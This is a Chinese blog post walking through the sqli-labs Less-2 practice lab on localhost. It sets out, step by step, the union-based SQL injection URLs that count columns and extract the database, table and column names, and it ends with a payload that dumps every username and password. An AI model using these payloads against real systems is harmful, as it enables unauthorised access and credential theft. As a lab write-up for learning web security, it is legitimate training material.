sqli-labs/Less-2注入

本文详细介绍了SQL注入攻击的一种常见场景,通过sqli-labs的Less-2关卡进行实战演练。首先判断输入类型为数字型,接着确定字段位数、占位信息,然后通过信息获取了数据库名、表名及字段名。最终成功找出账号密码信息,揭示了SQL注入的危害及防范措施。
摘要由CSDN通过智能技术生成

sqli-labs/Less-2注入

Sali-lsbs第二关

1、先判断是字符型还是数字型。

http://127.0.0.1/sqli-labs/Less-2/?id=4

在这里插入图片描述

127.0.0.1/sqli-labs/Less-2/?id=1 and 1=2

在这里插入图片描述
结果一样,说明是数字型。

2、确认字段位数

http://127.0.0.1/sqli-labs/Less-2/?id=3  order by 4

在这里插入图片描述

127.0.0.1/sqli-labs/Less-2/?id=3 order by 3

在这里插入图片描述
一共3位

3、确认占位信息

127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,2,3 	--+

注释符:-- (后面有空格)(也就是–+)
在这里插入图片描述
4、找库名

127.0.0.1/sqli-labs/Less-2/?id=-1 union select database(),2,3 --+

在这里插入图片描述
127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,database(),3
在这里插入图片描述
库名是security

5、找表名

127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'		--+

在这里插入图片描述
表名有emails、referers、uagents、users

6、找字段名

127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+

在这里插入图片描述
users表里有id、username、password三个字段

7、找账号密码信息

127.0.0.1/sqli-labs/Less-2/?id=-1	union	select 1,2,group_concat(concat_ws(',',username,password) SEPARATOR '|') from users

separator 默认是逗号 “,”,我这里用的"|"
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值